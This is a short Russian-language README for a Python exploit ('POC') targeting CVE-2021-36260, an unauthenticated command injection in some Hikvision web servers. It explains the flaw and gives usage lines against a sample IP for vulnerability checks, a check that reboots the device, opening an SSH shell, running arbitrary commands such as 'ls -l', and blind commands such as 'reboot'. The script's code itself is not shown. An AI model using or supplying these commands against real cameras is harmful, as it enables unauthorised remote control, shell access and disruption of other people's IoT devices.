
Python-эксплойт для CVE-2021-36260 - внедрение команд на веб-серверах Hikvision. Поддерживает безопасную/небезопасную проверку уязвимости, удаленное выполнение команд и доступ к SSH-оболочке на IoT-устройствах.
CVE-2021-36260 POC — уязвимость внедрения команд в веб-сервере некоторых продуктов Hikvision. Из-за недостаточной проверки входных данных злоумышленник может использовать уязвимость для проведения атаки с внедрением команд, отправляя сообщения с вредоносными командами.
Название эксплойта: Hikvision Web Server Build 210702 — Command Injection
Автор эксплойта: bashis — исправление ошибок от shubtheone
Сайт производителя: https://www.hikvision.com/
Версия: 1.0
CVE: CVE-2021-36260
Ссылка: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Примечание:
[Примеры] Безопасная проверка уязвимости/верификации: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Безопасная и небезопасная проверка уязвимости/верификации: (будет использовать 'небезопасную проверку', только если 'безопасная проверка' не подтвердила) $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Небезопасная проверка уязвимости/верификации: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Запуск и подключение к SSH-оболочке: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Выполнение команды: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Выполнение слепой команды: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"